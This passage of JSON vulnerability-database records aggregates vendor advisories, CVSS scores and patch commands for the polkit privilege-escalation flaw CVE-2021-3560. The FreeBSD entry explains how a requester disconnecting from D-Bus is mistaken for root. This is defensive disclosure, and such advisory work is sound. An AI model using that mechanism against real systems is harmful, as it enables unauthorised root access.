"CVE-2021-33033", "CVE-2021-33034", "CVE-2021-3326", "CVE-2021-33502", "CVE-2021-33623", "CVE-2021-3377", "CVE-2021-33909", "CVE-2021-33910", "CVE-2021-3449", "CVE-2021-3450", "CVE-2021-3516", "CVE-2021-3517", "CVE-2021-3518", "CVE-2021-3520", "CVE-2021-3537", "CVE-2021-3541", "CVE-2021-3560"], "modified": "2021-08-05T12:52:59", "id": "RHSA-2021:3016", "href": "https://access.redhat.com/errata/RHSA-2021:3016", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2022-11-06T17:58:39", "description": "An update that fixes one vulnerability is now available.\n\nDescription:\n\n This update for polkit fixes the following issues:\n\n - CVE-2021-3560: Fixed a local privilege escalation using\n polkit_system_bus_name_get_creds_sync() (bsc#1186497).\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.3:\n\n zypper in -t patch openSUSE-SLE-15.3-2021-1843=1", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-11T00:00:00", "type": "suse", "title": "Security update for polkit (important)", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", 
"version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2021-07-11T00:00:00", "id": "OPENSUSE-SU-2021:1843-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/2NCYKG2YTUVFTW5R7DJWWWJGLDWU7XE5/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-18T12:40:22", "description": "An update that fixes one vulnerability is now available.\n\nDescription:\n\n This update for polkit fixes the following issues:\n\n - CVE-2021-3560: Fixed a local privilege escalation using\n polkit_system_bus_name_get_creds_sync() (bsc#1186497).\n\n This update was imported from the SUSE:SLE-15-SP2:Update update project.\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.2:\n\n zypper in -t patch openSUSE-2021-838=1", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-04T00:00:00", "type": "suse", "title": "Security update for polkit (important)", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": 
"AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2021-06-04T00:00:00", "id": "OPENSUSE-SU-2021:0838-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/ABSE3IWWQYLOHOVCNFCOZVXFZAYMJYN4/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "photon": [{"lastseen": "2023-06-19T15:19:46", "description": "Updates of ['polkit'] packages of Photon OS have been released.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-03T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2021-4.0-0037", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2021-06-03T00:00:00", "id": "PHSA-2021-4.0-0037", "href": "https://github.com/vmware/photon/wiki/Security-Update-4.0-37", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-19T16:14:32", "description": "Updates of ['polkit'] packages of Photon OS have been 
released.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-03T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2021-0397", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2021-06-03T00:00:00", "id": "PHSA-2021-0397", "href": "https://github.com/vmware/photon/wiki/Security-Update-1.0-397", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-12T18:56:30", "description": "Updates of ['polkit'] packages of Photon OS have been released.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-03T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2021-0037", "bulletinFamily": "unix", "cvss2": 
{"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2021-06-03T00:00:00", "id": "PHSA-2021-0037", "href": "https://github.com/vmware/photon/wiki/Security-Update-4.0-37", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-03T08:54:49", "description": "An update of {'polkit'} packages of Photon OS has been released.\n", "cvss3": {}, "published": "2021-06-04T00:00:00", "type": "photon", "title": "PHSA-2021-2.0-0350", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2021-06-04T00:00:00", "id": "PHSA-2021-2.0-0350", "href": "https://github.com/vmware/photon/wiki/Security-Updates-2-350", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-11-03T08:46:42", "description": "An update of {'polkit'} packages of Photon OS has been released.\n", "cvss3": {}, "published": "2021-06-03T00:00:00", "type": "photon", "title": "PHSA-2021-1.0-0397", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2021-06-03T00:00:00", "id": "PHSA-2021-1.0-0397", "href": "https://github.com/vmware/photon/wiki/Security-Updates-1.0-397", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-19T15:55:02", "description": "Updates of ['polkit'] packages of Photon OS have been released.\n", "cvss3": 
{"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-04T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2021-0350", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2021-06-04T00:00:00", "id": "PHSA-2021-0350", "href": "https://github.com/vmware/photon/wiki/Security-Update-2.0-350", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-12T18:42:51", "description": "Updates of ['polkit', 'go'] packages of Photon OS have been released.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-04T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2021-0248", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", 
"exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-24553", "CVE-2020-29510", "CVE-2021-27918", "CVE-2021-3114", "CVE-2021-3560"], "modified": "2021-06-04T00:00:00", "id": "PHSA-2021-0248", "href": "https://github.com/vmware/photon/wiki/Security-Update-3.0-248", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-29T08:15:46", "description": "Updates of ['go', 'polkit'] packages of Photon OS have been released.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-04T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2021-3.0-0248", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-24553", 
"CVE-2020-29510", "CVE-2021-27918", "CVE-2021-3114", "CVE-2021-3560"], "modified": "2021-06-04T00:00:00", "id": "PHSA-2021-3.0-0248", "href": "https://github.com/vmware/photon/wiki/Security-Update-3.0-248", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "redhatcve": [{"lastseen": "2023-06-19T15:18:11", "description": "It was found that polkit could be tricked into bypassing the credential checks for D-Bus requests, elevating the privileges of the requestor to the root user. This flaw could be used by an unprivileged local attacker to, for example, create a new local administrator. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.\n#### Mitigation\n\nRed Hat has investigated whether a possible mitigation exists for this issue, and has not been able to identify a practical example. Please update as soon as possible. \n\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-03T07:20:59", "type": "redhatcve", "title": "CVE-2021-3560", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": 
"2023-04-06T08:14:12", "id": "RH:CVE-2021-3560", "href": "https://access.redhat.com/security/cve/cve-2021-3560", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa_kev": [{"lastseen": "2023-07-21T17:22:44", "description": "Red Hat Polkit contains an incorrect authorization vulnerability through the bypassing of credential checks for D-Bus requests, allowing for privilege escalation.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-05-12T00:00:00", "type": "cisa_kev", "title": "Red Hat Polkit Incorrect Authorization Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2023-05-12T00:00:00", "id": "CISA-KEV-CVE-2021-3560", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2023-06-19T15:37:27", "description": "\n\nCedric Buissart reports:\n\nThe function polkit_system_bus_name_get_creds_sync is used to get the\n\t uid and pid of the process requesting the action. 
It does this by\n\t sending the unique bus name of the requesting process, which is\n\t typically something like \":1.96\", to dbus-daemon. These unique names\n\t are assigned and managed by dbus-daemon and cannot be forged, so this\n\t is a good way to check the privileges of the requesting process.\nThe vulnerability happens when the requesting process disconnects from\n\t dbus-daemon just before the call to\n\t polkit_system_bus_name_get_creds_sync starts. In this scenario, the\n\t unique bus name is no longer valid, so dbus-daemon sends back an error\n\t reply. This error case is handled in\n\t polkit_system_bus_name_get_creds_sync by setting the value of the\n\t error parameter, but it still returns TRUE, rather than FALSE.\n\t This behavior means that all callers of\n\t polkit_system_bus_name_get_creds_sync need to carefully check whether\n\t an error was set. If the calling function forgets to check for errors\n\t then it will think that the uid of the requesting process is 0 (because\n\t the AsyncGetBusNameCredsData struct is zero initialized). 
In other\n\t words, it will think that the action was requested by a root process,\n\t and will therefore allow it.\n\n\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-03T00:00:00", "type": "freebsd", "title": "polkit -- local privilege escalation using polkit_system_bus_name_get_creds_sync", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2021-06-03T00:00:00", "id": "36A35D83-C560-11EB-84AB-E0D55E2A8BF9", "href": "https://vuxml.freebsd.org/freebsd/36a35d83-c560-11eb-84ab-e0d55e2a8bf9.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2023-06-19T15:36:02", "description": "polkit is a toolkit for defining and handling authorizations. It is used for allowing unprivileged processes to speak to privileged processes. 
", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-19T01:14:12", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: polkit-0.117-2.fc33.1", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2021-06-19T01:14:12", "id": "FEDORA:D126131F01F8", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/FBORD44GPNJPRTR7EN52KG5UBJ754TAJ/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-19T15:36:02", "description": "polkit is a toolkit for defining and handling authorizations. It is used for allowing unprivileged processes to speak to privileged processes. 
", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-07T01:16:40", "type": "fedora", "title": "[SECURITY] Fedora 34 Update: polkit-0.117-3.fc34.1", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2021-06-07T01:16:40", "id": "FEDORA:6431E305A8AE", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/KAEOWGOHEJK76KE57HCCTP7AFD35SBUG/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "debiancve": [{"lastseen": "2023-06-19T15:24:18", "description": "It was found that polkit could be tricked into bypassing the credential checks for D-Bus requests, elevating the privileges of the requestor to the root user. This flaw could be used by an unprivileged local attacker to, for example, create a new local administrator. 
The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-16T19:15:00", "type": "debiancve", "title": "CVE-2021-3560", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2022-02-16T19:15:00", "id": "DEBIANCVE:CVE-2021-3560", "href": "https://security-tracker.debian.org/tracker/CVE-2021-3560", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "slackware": [{"lastseen": "2023-06-19T15:05:25", "description": "New polkit packages are available for Slackware 14.2 and -current to\nfix a security issue.\n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n\npatches/packages/polkit-0.113-i586-3_slack14.2.txz: Rebuilt.\n This update includes a mitigation for local privilege escalation using\n polkit_system_bus_name_get_creds_sync().\n For more information, see:\n https://vulners.com/cve/CVE-2021-3560\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and 
rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/polkit-0.113-i586-3_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/polkit-0.113-x86_64-3_slack14.2.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/polkit-0.119-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/polkit-0.119-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 14.2 package:\nd0a4fd417b76e84c8d9cd6ebe114e647 polkit-0.113-i586-3_slack14.2.txz\n\nSlackware x86_64 14.2 package:\nd7772cbf234dc38e87298cbaa37ba80e polkit-0.113-x86_64-3_slack14.2.txz\n\nSlackware -current package:\n64fec13a890084fb063867ddca80cc3f l/polkit-0.119-i586-1.txz\n\nSlackware x86_64 -current package:\n69e81fef9df950635769876e703ed639 l/polkit-0.119-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg polkit-0.113-i586-3_slack14.2.txz", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-07T19:07:33", "type": "slackware", "title": "[slackware-security] polkit", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 
"confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2021-06-07T19:07:33", "id": "SSA-2021-158-02", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2021&m=slackware-security.342839", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "alpinelinux": [{"lastseen": "2023-06-23T11:06:03", "description": "It was found that polkit could be tricked into bypassing the credential checks for D-Bus requests, elevating the privileges of the requestor to the root user. This flaw could be used by an unprivileged local attacker to, for example, create a new local administrator. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-16T19:15:00", "type": "alpinelinux", "title": "CVE-2021-3560", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, 